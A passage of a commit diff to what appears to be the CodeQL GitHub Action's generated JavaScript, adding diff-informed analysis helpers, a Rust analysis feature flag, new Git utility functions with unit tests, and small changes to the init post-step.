C,IAAI,KAAK,YAAY,YAAY,CAAC,iBAAiB,EAAE,CAAC;gBACpD,MAAM,CAAC,IAAI,CACT,2BAA2B,QAAQ,aAAa,GAAG,qBAAqB,CACzE,CAAC;gBACF,MAAM,CAAC,KAAK,CAAC,KAAK,CAAC,OAAO,CAAC,CAAC;YAC9B,CAAC;iBAAM,CAAC;gBACN,kCAAkC;gBAClC,MAAM,KAAK,CAAC;YACd,CAAC;QACH,CAAC;IACH,CAAC;AACH,CAAC;AAED;;;;;;GAMG;AACH,KAAK,UAAU,QAAQ,CACrB,QAAkB,EAClB,WAAwB;IAExB,MAAM,IAAI,GAAG,MAAM,IAAI,CAAC,SAAS,CAAC,WAAW,CAAC,IAAI,CAAC,IAAI,CAAC,IAAI,CAAC,CAAC,CAAC;IAC/D,OAAO,GAAG,MAAM,WAAW,CAAC,QAAQ,CAAC,GAAG,IAAI,EAAE,CAAC;AACjD,CAAC;AAED;;;;;;GAMG;AACH,KAAK,UAAU,WAAW,CAAC,QAAkB;IAC3C,MAAM,QAAQ,GAAG,IAAA,0BAAmB,EAAC,WAAW,CAAC,CAAC;IAClD,MAAM,YAAY,GAAG,OAAO,CAAC,GAAG,CAAC,oBAAM,CAAC,yBAAyB,CAAC,CAAC;IACnE,IAAI,MAAM,GAAG,8BAA8B,CAAC;IAE5C,IAAI,YAAY,KAAK,SAAS,IAAI,YAAY,CAAC,MAAM,GAAG,CAAC,EAAE,CAAC;QAC1D,MAAM,GAAG,GAAG,MAAM,IAAI,YAAY,EAAE,CAAC;IACvC,CAAC;IAED,OAAO,GAAG,MAAM,IAAI,+BAA+B,IAAI,QAAQ,IAAI,QAAQ,GAAG,CAAC;AACjF,CAAC"}
114  lib/diff-informed-analysis-utils.js  generated  Normal file
@@ -0,0 +1,114 @@
+"use strict";
+var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    var desc = Object.getOwnPropertyDescriptor(m, k);
+    if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) {
+      desc = { enumerable: true, get: function() { return m[k]; } };
+    }
+    Object.defineProperty(o, k2, desc);
+}) : (function(o, m, k, k2) {
+    if (k2 === undefined) k2 = k;
+    o[k2] = m[k];
+}));
+var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) {
+    Object.defineProperty(o, "default", { enumerable: true, value: v });
+}) : function(o, v) {
+    o["default"] = v;
+});
+var __importStar = (this && this.__importStar) || (function () {
+    var ownKeys = function(o) {
+        ownKeys = Object.getOwnPropertyNames || function (o) {
+            var ar = [];
+            for (var k in o) if (Object.prototype.hasOwnProperty.call(o, k)) ar[ar.length] = k;
+            return ar;
+        };
+        return ownKeys(o);
+    };
+    return function (mod) {
+        if (mod && mod.__esModule) return mod;
+        var result = {};
+        if (mod != null) for (var k = ownKeys(mod), i = 0; i < k.length; i++) if (k[i] !== "default") __createBinding(result, mod, k[i]);
+        __setModuleDefault(result, mod);
+        return result;
+    };
+})();
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.shouldPerformDiffInformedAnalysis = shouldPerformDiffInformedAnalysis;
+exports.getDiffInformedAnalysisBranches = getDiffInformedAnalysisBranches;
+exports.writeDiffRangesJsonFile = writeDiffRangesJsonFile;
+exports.readDiffRangesJsonFile = readDiffRangesJsonFile;
+const fs = __importStar(require("fs"));
+const path = __importStar(require("path"));
+const github = __importStar(require("@actions/github"));
+const actionsUtil = __importStar(require("./actions-util"));
+const feature_flags_1 = require("./feature-flags");
+function getPullRequestBranches() {
+    const pullRequest = github.context.payload.pull_request;
+    if (pullRequest) {
+        return {
+            base: pullRequest.base.ref,
+            // We use the head label instead of the head ref here, because the head
+            // ref lacks owner information and by itself does not uniquely identify
+            // the head branch (which may be in a forked repository).
+            head: pullRequest.head.label,
+        };
+    }
+    // PR analysis under Default Setup does not have the pull_request context,
+    // but it should set CODE_SCANNING_REF and CODE_SCANNING_BASE_BRANCH.
+    const codeScanningRef = process.env.CODE_SCANNING_REF;
+    const codeScanningBaseBranch = process.env.CODE_SCANNING_BASE_BRANCH;
+    if (codeScanningRef && codeScanningBaseBranch) {
+        return {
+            base: codeScanningBaseBranch,
+            // PR analysis under Default Setup analyzes the PR head commit instead of
+            // the merge commit, so we can use the provided ref directly.
+            head: codeScanningRef,
+        };
+    }
+    return undefined;
+}
+/**
+ * Check if the action should perform diff-informed analysis.
+ */
+async function shouldPerformDiffInformedAnalysis(codeql, features, logger) {
+    return ((await getDiffInformedAnalysisBranches(codeql, features, logger)) !==
+        undefined);
+}
+/**
+ * Get the branches to use for diff-informed analysis.
+ *
+ * @returns If the action should perform diff-informed analysis, return
+ * the base and head branches that should be used to compute the diff ranges.
+ * Otherwise return `undefined`.
+ */
+async function getDiffInformedAnalysisBranches(codeql, features, logger) {
+    if (!(await features.getValue(feature_flags_1.Feature.DiffInformedQueries, codeql))) {
+        return undefined;
+    }
+    const branches = getPullRequestBranches();
+    if (!branches) {
+        logger.info("Not performing diff-informed analysis " +
+            "because we are not analyzing a pull request.");
+    }
+    return branches;
+}
+function getDiffRangesJsonFilePath() {
+    return path.join(actionsUtil.getTemporaryDirectory(), "pr-diff-range.json");
+}
+function writeDiffRangesJsonFile(logger, ranges) {
+    const jsonContents = JSON.stringify(ranges, null, 2);
+    const jsonFilePath = getDiffRangesJsonFilePath();
+    fs.writeFileSync(jsonFilePath, jsonContents);
+    logger.debug(`Wrote pr-diff-range JSON file to ${jsonFilePath}:\n${jsonContents}`);
+}
+function readDiffRangesJsonFile(logger) {
+    const jsonFilePath = getDiffRangesJsonFilePath();
+    if (!fs.existsSync(jsonFilePath)) {
+        logger.debug(`Diff ranges JSON file does not exist at ${jsonFilePath}`);
+        return undefined;
+    }
+    const jsonContents = fs.readFileSync(jsonFilePath, "utf8");
+    logger.debug(`Read pr-diff-range JSON file from ${jsonFilePath}:\n${jsonContents}`);
+    return JSON.parse(jsonContents);
+}
+//# sourceMappingURL=diff-informed-analysis-utils.js.map
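Annotation: the write/read pair above is a plain JSON round trip through the runner's temporary directory. A minimal usage sketch in TypeScript, assuming a console-backed logger stand-in and a { path, startLine, endLine } range shape; both are illustrative, not part of the diff:

    // Sketch only: exercises writeDiffRangesJsonFile / readDiffRangesJsonFile.
    import { writeDiffRangesJsonFile, readDiffRangesJsonFile } from "./diff-informed-analysis-utils";

    const logger = { debug: (msg: string) => console.log(msg) } as any; // minimal stand-in
    // Hypothetical diff range; the real ranges are computed from the PR's base/head diff.
    writeDiffRangesJsonFile(logger, [{ path: "src/app.ts", startLine: 10, endLine: 42 }] as any);
    const ranges = readDiffRangesJsonFile(logger); // same array parsed back, or undefined if missing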
1 lib/diff-informed-analysis-utils.js.map Normal file
@@ -0,0 +1 @@
{"version":3,"file":"diff-informed-analysis-utils.js","sourceRoot":"","sources":["../src/diff-informed-analysis-utils.ts"],"names":[],"mappings":"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"}
9 lib/feature-flags.js generated
@@ -68,6 +68,7 @@ var Feature;
     Feature["ExtractToToolcache"] = "extract_to_toolcache";
     Feature["PythonDefaultIsToNotExtractStdlib"] = "python_default_is_to_not_extract_stdlib";
     Feature["QaTelemetryEnabled"] = "qa_telemetry_enabled";
+    Feature["RustAnalysis"] = "rust_analysis";
     Feature["ZstdBundleStreamingExtraction"] = "zstd_bundle_streaming_extraction";
 })(Feature || (exports.Feature = Feature = {}));
 exports.featureConfig = {
@@ -95,8 +96,7 @@ exports.featureConfig = {
     [Feature.DiffInformedQueries]: {
         defaultValue: false,
         envVar: "CODEQL_ACTION_DIFF_INFORMED_QUERIES",
-        minimumVersion: undefined,
-        toolsFeature: tools_features_1.ToolsFeature.DatabaseInterpretResultsSupportsSarifRunProperty,
+        minimumVersion: "2.21.0",
     },
     [Feature.DisableCsharpBuildless]: {
         defaultValue: false,
@@ -132,6 +132,11 @@ exports.featureConfig = {
         minimumVersion: undefined,
         toolsFeature: tools_features_1.ToolsFeature.PythonDefaultIsToNotExtractStdlib,
     },
+    [Feature.RustAnalysis]: {
+        defaultValue: false,
+        envVar: "CODEQL_ACTION_RUST_ANALYSIS",
+        minimumVersion: "2.19.3",
+    },
     [Feature.QaTelemetryEnabled]: {
         defaultValue: false,
         envVar: "CODEQL_ACTION_QA_TELEMETRY",
File diff suppressed because one or more lines are too long
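Annotation: each featureConfig entry combines a default, an env-var override, and an optional minimum CLI version (the new RustAnalysis entry pins 2.19.3; DiffInformedQueries now pins 2.21.0). A simplified sketch of how such an entry could be resolved; the exact precedence, including the remote feature-flag API consulted by Features.getValue, lives in src/feature-flags.ts and is assumed here:

    import * as semver from "semver";

    interface FeatureConfigEntry {
      defaultValue: boolean;
      envVar: string;
      minimumVersion?: string; // minimum CodeQL CLI version, e.g. "2.19.3"
    }

    // Simplified resolution order: a too-old CLI disables the feature,
    // an explicit env-var override wins, otherwise fall back to the default.
    function getValueSketch(entry: FeatureConfigEntry, cliVersion: string): boolean {
      if (entry.minimumVersion && semver.lt(cliVersion, entry.minimumVersion)) {
        return false; // CLI too old for the feature
      }
      const override = process.env[entry.envVar];
      if (override === "true") return true;
      if (override === "false") return false;
      return entry.defaultValue;
    }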
126 lib/git-utils.js generated
@@ -33,7 +33,7 @@ var __importStar = (this && this.__importStar) || (function () {
     };
 })();
 Object.defineProperty(exports, "__esModule", { value: true });
-exports.decodeGitFilePath = exports.getGitDiffHunkHeaders = exports.getAllGitMergeBases = exports.gitRepack = exports.gitFetch = exports.deepenGitHistory = exports.determineBaseBranchHeadCommitOid = exports.getCommitOid = void 0;
+exports.getFileOidsUnderPath = exports.getGitRoot = exports.decodeGitFilePath = exports.gitRepack = exports.gitFetch = exports.deepenGitHistory = exports.determineBaseBranchHeadCommitOid = exports.getCommitOid = exports.runGitCommand = void 0;
 exports.getRef = getRef;
 exports.isAnalyzingDefaultBranch = isAnalyzingDefaultBranch;
 const core = __importStar(require("@actions/core"));
@@ -41,7 +41,7 @@ const toolrunner = __importStar(require("@actions/exec/lib/toolrunner"));
 const io = __importStar(require("@actions/io"));
 const actions_util_1 = require("./actions-util");
 const util_1 = require("./util");
-async function runGitCommand(checkoutPath, args, customErrorMessage) {
+const runGitCommand = async function (workingDirectory, args, customErrorMessage) {
     let stdout = "";
     let stderr = "";
     core.debug(`Running git command: git ${args.join(" ")}`);
@@ -56,7 +56,7 @@ async function runGitCommand(checkoutPath, args, customErrorMessage) {
                 stderr += data.toString();
             },
         },
-        cwd: checkoutPath,
+        cwd: workingDirectory,
     }).exec();
     return stdout;
     }
@@ -69,7 +69,8 @@ async function runGitCommand(checkoutPath, args, customErrorMessage) {
         core.info(`git call failed. ${customErrorMessage} Error: ${reason}`);
         throw error;
     }
-}
+};
+exports.runGitCommand = runGitCommand;
 /**
  * Gets the SHA of the commit that is currently checked out.
  */
@@ -82,7 +83,7 @@ const getCommitOid = async function (checkoutPath, ref = "HEAD") {
     // Even if this does go wrong, it's not a huge problem for the alerts to
     // reported on the merge commit.
     try {
-        const stdout = await runGitCommand(checkoutPath, ["rev-parse", ref], "Continuing with commit SHA from user input or environment.");
+        const stdout = await (0, exports.runGitCommand)(checkoutPath, ["rev-parse", ref], "Continuing with commit SHA from user input or environment.");
         return stdout.trim();
     }
     catch {
@@ -106,7 +107,7 @@ const determineBaseBranchHeadCommitOid = async function (checkoutPathOverride) {
     let commitOid = "";
     let baseOid = "";
     let headOid = "";
-    const stdout = await runGitCommand(checkoutPath, ["show", "-s", "--format=raw", mergeSha], "Will calculate the base branch SHA on the server.");
+    const stdout = await (0, exports.runGitCommand)(checkoutPath, ["show", "-s", "--format=raw", mergeSha], "Will calculate the base branch SHA on the server.");
     for (const data of stdout.split("\n")) {
         if (data.startsWith("commit ") && commitOid === "") {
             commitOid = data.substring(7);
@@ -141,7 +142,7 @@ exports.determineBaseBranchHeadCommitOid = determineBaseBranchHeadCommitOid;
  */
 const deepenGitHistory = async function () {
     try {
-        await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), [
+        await (0, exports.runGitCommand)((0, actions_util_1.getOptionalInput)("checkout_path"), [
             "fetch",
             "origin",
             "HEAD",
@@ -163,7 +164,7 @@ exports.deepenGitHistory = deepenGitHistory;
  */
 const gitFetch = async function (branch, extraFlags) {
     try {
-        await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), ["fetch", "--no-tags", ...extraFlags, "origin", `${branch}:${branch}`], `Cannot fetch ${branch}.`);
+        await (0, exports.runGitCommand)((0, actions_util_1.getOptionalInput)("checkout_path"), ["fetch", "--no-tags", ...extraFlags, "origin", `${branch}:${branch}`], `Cannot fetch ${branch}.`);
     }
     catch {
         // Errors are already logged by runGitCommand()
@@ -178,68 +179,13 @@ exports.gitFetch = gitFetch;
  */
 const gitRepack = async function (flags) {
     try {
-        await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), ["repack", ...flags], "Cannot repack the repository.");
+        await (0, exports.runGitCommand)((0, actions_util_1.getOptionalInput)("checkout_path"), ["repack", ...flags], "Cannot repack the repository.");
     }
     catch {
         // Errors are already logged by runGitCommand()
     }
 };
 exports.gitRepack = gitRepack;
-/**
- * Compute the all merge bases between the given refs. Returns an empty array
- * if no merge base is found, or if there is an error.
- *
- * This function uses the `checkout_path` to determine the repository path and
- * works only when called from `analyze` or `upload-sarif`.
- */
-const getAllGitMergeBases = async function (refs) {
-    try {
-        const stdout = await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), ["merge-base", "--all", ...refs], `Cannot get merge base of ${refs}.`);
-        return stdout.trim().split("\n");
-    }
-    catch {
-        return [];
-    }
-};
-exports.getAllGitMergeBases = getAllGitMergeBases;
-/**
- * Compute the diff hunk headers between the two given refs.
- *
- * This function uses the `checkout_path` to determine the repository path and
- * works only when called from `analyze` or `upload-sarif`.
- *
- * @returns an array of diff hunk headers (one element per line), or undefined
- * if the action was not triggered by a pull request, or if the diff could not
- * be determined.
- */
-const getGitDiffHunkHeaders = async function (fromRef, toRef) {
-    let stdout = "";
-    try {
-        stdout = await runGitCommand((0, actions_util_1.getOptionalInput)("checkout_path"), [
-            "-c",
-            "core.quotePath=false",
-            "diff",
-            "--no-renames",
-            "--irreversible-delete",
-            "-U0",
-            fromRef,
-            toRef,
-        ], `Cannot get diff from ${fromRef} to ${toRef}.`);
-    }
-    catch {
-        return undefined;
-    }
-    const headers = [];
-    for (const line of stdout.split("\n")) {
-        if (line.startsWith("--- ") ||
-            line.startsWith("+++ ") ||
-            line.startsWith("@@ ")) {
-            headers.push(line);
-        }
-    }
-    return headers;
-};
-exports.getGitDiffHunkHeaders = getGitDiffHunkHeaders;
 /**
  * Decode, if necessary, a file path produced by Git. See
  * https://git-scm.com/docs/git-config#Documentation/git-config.txt-corequotePath
@@ -285,6 +231,58 @@ const decodeGitFilePath = function (filePath) {
     return filePath;
 };
 exports.decodeGitFilePath = decodeGitFilePath;
+/**
+ * Get the root of the Git repository.
+ *
+ * @param sourceRoot The source root of the code being analyzed.
+ * @returns The root of the Git repository.
+ */
+const getGitRoot = async function (sourceRoot) {
+    try {
+        const stdout = await (0, exports.runGitCommand)(sourceRoot, ["rev-parse", "--show-toplevel"], `Cannot find Git repository root from the source root ${sourceRoot}.`);
+        return stdout.trim();
+    }
+    catch {
+        // Errors are already logged by runGitCommand()
+        return undefined;
+    }
+};
+exports.getGitRoot = getGitRoot;
+/**
+ * Returns the Git OIDs of all tracked files (in the index and in the working
+ * tree) that are under the given base path, including files in active
+ * submodules. Untracked files and files not under the given base path are
+ * ignored.
+ *
+ * @param basePath A path into the Git repository.
+ * @returns a map from file paths (relative to `basePath`) to Git OIDs.
+ * @throws {Error} if "git ls-tree" produces unexpected output.
+ */
+const getFileOidsUnderPath = async function (basePath) {
+    // Without the --full-name flag, the path is relative to the current working
+    // directory of the git command, which is basePath.
+    const stdout = await (0, exports.runGitCommand)(basePath, ["ls-files", "--recurse-submodules", "--format=%(objectname)_%(path)"], "Cannot list Git OIDs of tracked files.");
+    const fileOidMap = {};
+    // With --format=%(objectname)_%(path), the output is a list of lines like:
+    // 30d998ded095371488be3a729eb61d86ed721a18_lib/git-utils.js
+    // d89514599a9a99f22b4085766d40af7b99974827_lib/git-utils.js.map
+    const regex = /^([0-9a-f]{40})_(.+)$/;
+    for (const line of stdout.split("\n")) {
+        if (line) {
+            const match = line.match(regex);
+            if (match) {
+                const oid = match[1];
+                const path = (0, exports.decodeGitFilePath)(match[2]);
+                fileOidMap[path] = oid;
+            }
+            else {
+                throw new Error(`Unexpected "git ls-files" output: ${line}`);
+            }
+        }
+    }
+    return fileOidMap;
+};
+exports.getFileOidsUnderPath = getFileOidsUnderPath;
 function getRefFromEnv() {
     // To workaround a limitation of Actions dynamic workflows not setting
     // the GITHUB_REF in some cases, we accept also the ref within the
File diff suppressed because one or more lines are too long
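Annotation: getFileOidsUnderPath above relies on git ls-files --recurse-submodules --format=%(objectname)_%(path), then splits each line after the 40-hex-character OID and the underscore separator. A worked example of that parse step with hypothetical output:

    // Hypothetical ls-files output; quoted paths would be decoded by decodeGitFilePath.
    const stdout =
      "30d998ded095371488be3a729eb61d86ed721a18_lib/git-utils.js\n" +
      "d89514599a9a99f22b4085766d40af7b99974827_src/git-utils.ts\n";
    const regex = /^([0-9a-f]{40})_(.+)$/;
    const fileOidMap: Record<string, string> = {};
    for (const line of stdout.split("\n")) {
      if (!line) continue;
      const match = line.match(regex);
      if (!match) throw new Error(`Unexpected "git ls-files" output: ${line}`);
      fileOidMap[match[2]] = match[1]; // path -> OID
    }
    // fileOidMap: { "lib/git-utils.js": "30d9...", "src/git-utils.ts": "d895..." }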
71 lib/git-utils.test.js generated
@@ -265,4 +265,75 @@ const util_1 = require("./util");
     t.deepEqual(gitUtils.decodeGitFilePath('"foo\\vbar"'), "foo\vbar");
     t.deepEqual(gitUtils.decodeGitFilePath('"\\a\\b\\f\\n\\r\\t\\v"'), "\x07\b\f\n\r\t\v");
 });
+(0, ava_1.default)("getFileOidsUnderPath returns correct file mapping", async (t) => {
+    const runGitCommandStub = sinon
+        .stub(gitUtils, "runGitCommand")
+        .resolves("30d998ded095371488be3a729eb61d86ed721a18_lib/git-utils.js\n" +
+        "d89514599a9a99f22b4085766d40af7b99974827_lib/git-utils.js.map\n" +
+        "a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96_src/git-utils.ts");
+    try {
+        const result = await gitUtils.getFileOidsUnderPath("/fake/path");
+        t.deepEqual(result, {
+            "lib/git-utils.js": "30d998ded095371488be3a729eb61d86ed721a18",
+            "lib/git-utils.js.map": "d89514599a9a99f22b4085766d40af7b99974827",
+            "src/git-utils.ts": "a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96",
+        });
+        t.deepEqual(runGitCommandStub.firstCall.args, [
+            "/fake/path",
+            ["ls-files", "--recurse-submodules", "--format=%(objectname)_%(path)"],
+            "Cannot list Git OIDs of tracked files.",
+        ]);
+    }
+    finally {
+        runGitCommandStub.restore();
+    }
+});
+(0, ava_1.default)("getFileOidsUnderPath handles quoted paths", async (t) => {
+    const runGitCommandStub = sinon
+        .stub(gitUtils, "runGitCommand")
+        .resolves("30d998ded095371488be3a729eb61d86ed721a18_lib/normal-file.js\n" +
+        'd89514599a9a99f22b4085766d40af7b99974827_"lib/file with spaces.js"\n' +
+        'a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96_"lib/file\\twith\\ttabs.js"');
+    try {
+        const result = await gitUtils.getFileOidsUnderPath("/fake/path");
+        t.deepEqual(result, {
+            "lib/normal-file.js": "30d998ded095371488be3a729eb61d86ed721a18",
+            "lib/file with spaces.js": "d89514599a9a99f22b4085766d40af7b99974827",
+            "lib/file\twith\ttabs.js": "a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96",
+        });
+    }
+    finally {
+        runGitCommandStub.restore();
+    }
+});
+(0, ava_1.default)("getFileOidsUnderPath handles empty output", async (t) => {
+    const runGitCommandStub = sinon
+        .stub(gitUtils, "runGitCommand")
+        .resolves("");
+    try {
+        const result = await gitUtils.getFileOidsUnderPath("/fake/path");
+        t.deepEqual(result, {});
+    }
+    finally {
+        runGitCommandStub.restore();
+    }
+});
+(0, ava_1.default)("getFileOidsUnderPath throws on unexpected output format", async (t) => {
+    const runGitCommandStub = sinon
+        .stub(gitUtils, "runGitCommand")
+        .resolves("30d998ded095371488be3a729eb61d86ed721a18_lib/git-utils.js\n" +
+        "invalid-line-format\n" +
+        "a47c11f5bfdca7661942d2c8f1b7209fb0dfdf96_src/git-utils.ts");
+    try {
+        await t.throwsAsync(async () => {
+            await gitUtils.getFileOidsUnderPath("/fake/path");
+        }, {
+            instanceOf: Error,
+            message: 'Unexpected "git ls-files" output: invalid-line-format',
+        });
+    }
+    finally {
+        runGitCommandStub.restore();
+    }
+});
 //# sourceMappingURL=git-utils.test.js.map
File diff suppressed because one or more lines are too long
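Annotation: all four new tests share a stub-in-try / restore-in-finally shape so a failing assertion cannot leak the stub into later tests. The pattern in isolation, using ava and sinon as in the file above:

    import test from "ava";
    import * as sinon from "sinon";
    import * as gitUtils from "./git-utils";

    test("stub/restore pattern sketch", async (t) => {
      const stub = sinon.stub(gitUtils, "runGitCommand").resolves("");
      try {
        t.deepEqual(await gitUtils.getFileOidsUnderPath("/fake/path"), {});
      } finally {
        stub.restore(); // runs even when an assertion throws
      }
    });

This is presumably also why the git-utils.js change converts runGitCommand from a function declaration into an exported const: call sites go through exports.runGitCommand, so sinon can replace it at test time.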
2 lib/init-action-post-helper.js generated
@@ -173,7 +173,7 @@ async function removeUploadedSarif(uploadFailedSarifResult, logger) {
     logger.info(`In test mode, therefore deleting the failed analysis to avoid impacting tool status for the Action repository. SARIF ID to delete: ${sarifID}.`);
     const client = (0, api_client_1.getApiClient)();
     try {
-        const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
+        const repositoryNwo = (0, repository_1.getRepositoryNwo)();
         // Wait to make sure the analysis is ready for download before requesting it.
         await (0, util_1.delay)(5000);
         // Get the analysis associated with the uploaded sarif
File diff suppressed because one or more lines are too long
9 lib/init-action-post.js generated
@@ -59,14 +59,15 @@ async function runWrapper() {
     (0, actions_util_1.restoreInputs)();
     const gitHubVersion = await (0, api_client_1.getGitHubVersion)();
     (0, util_1.checkGitHubVersionInRange)(gitHubVersion, logger);
-    const repositoryNwo = (0, repository_1.parseRepositoryNwo)((0, util_1.getRequiredEnvParam)("GITHUB_REPOSITORY"));
+    const repositoryNwo = (0, repository_1.getRepositoryNwo)();
     const features = new feature_flags_1.Features(gitHubVersion, repositoryNwo, (0, actions_util_1.getTemporaryDirectory)(), logger);
     config = await (0, config_utils_1.getConfig)((0, actions_util_1.getTemporaryDirectory)(), logger);
     if (config === undefined) {
         logger.warning("Debugging artifacts are unavailable since the 'init' Action failed before it could produce any.");
-        return;
     }
-    uploadFailedSarifResult = await initActionPostHelper.run(debugArtifacts.tryUploadAllAvailableDebugArtifacts, actions_util_1.printDebugLogs, config, repositoryNwo, features, logger);
+    else {
+        uploadFailedSarifResult = await initActionPostHelper.run(debugArtifacts.tryUploadAllAvailableDebugArtifacts, actions_util_1.printDebugLogs, config, repositoryNwo, features, logger);
+    }
 }
 catch (unwrappedError) {
     const error = (0, util_1.wrapError)(unwrappedError);
@@ -86,7 +87,9 @@ async function runWrapper() {
         ...uploadFailedSarifResult,
         job_status: initActionPostHelper.getFinalJobStatus(),
     };
+    logger.info("Sending status report for init-post step.");
     await (0, status_report_1.sendStatusReport)(statusReport);
+    logger.info("Status report sent for init-post step.");
 }
 }
 void runWrapper();
lib/init-action-post.js.map
@@ -1 +1 @@
{"version":3,"file":"init-action-post.js","sourceRoot":"","sources":["../src/init-action-post.ts"],"names":[],"mappings":";AAAA;;;;GAIG;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;AAEH,oDAAsC;AAEtC,iDAIwB;AACxB,6CAAgD;AAChD,iDAAmD;AACnD,kEAAoD;AACpD,mDAA2C;AAC3C,gFAAkE;AAClE,uCAA6C;AAC7C,6CAAkD;AAClD,mDAOyB;AACzB,iCAKgB;AAOhB,KAAK,UAAU,UAAU;IACvB,MAAM,MAAM,GAAG,IAAA,0BAAgB,GAAE,CAAC;IAClC,MAAM,SAAS,GAAG,IAAI,IAAI,EAAE,CAAC;IAC7B,IAAI,MAA0B,CAAC;IAC/B,IAAI,uBAES,CAAC;IACd,IAAI,CAAC;QACH,qCAAqC;QACrC,IAAA,4BAAa,GAAE,CAAC;QAEhB,MAAM,aAAa,GAAG,MAAM,IAAA,6BAAgB,GAAE,CAAC;QAC/C,IAAA,gCAAyB,EAAC,aAAa,EAAE,MAAM,CAAC,CAAC;QAEjD,MAAM,aAAa,GAAG,IAAA,+BAAkB,EACtC,IAAA,0BAAmB,EAAC,mBAAmB,CAAC,CACzC,CAAC;QACF,MAAM,QAAQ,GAAG,IAAI,wBAAQ,CAC3B,aAAa,EACb,aAAa,EACb,IAAA,oCAAqB,GAAE,EACvB,MAAM,CACP,CAAC;QAEF,MAAM,GAAG,MAAM,IAAA,wBAAS,EAAC,IAAA,oCAAqB,GAAE,EAAE,MAAM,CAAC,CAAC;QAC1D,IAAI,MAAM,KAAK,SAAS,EAAE,CAAC;YACzB,MAAM,CAAC,OAAO,CACZ,iGAAiG,CAClG,CAAC;YACF,OAAO;QACT,CAAC;QAED,uBAAuB,GAAG,MAAM,oBAAoB,CAAC,GAAG,CACtD,cAAc,CAAC,mCAAmC,EAClD,6BAAc,EACd,MAAM,EACN,aAAa,EACb,QAAQ,EACR,MAAM,CACP,CAAC;IACJ,CAAC;IAAC,OAAO,cAAc,EAAE,CAAC;QACxB,MAAM,KAAK,GAAG,IAAA,gBAAS,EAAC,cAAc,CAAC,CAAC;QACxC,IAAI,CAAC,SAAS,CAAC,KAAK,CAAC,OAAO,CAAC,CAAC;QAE9B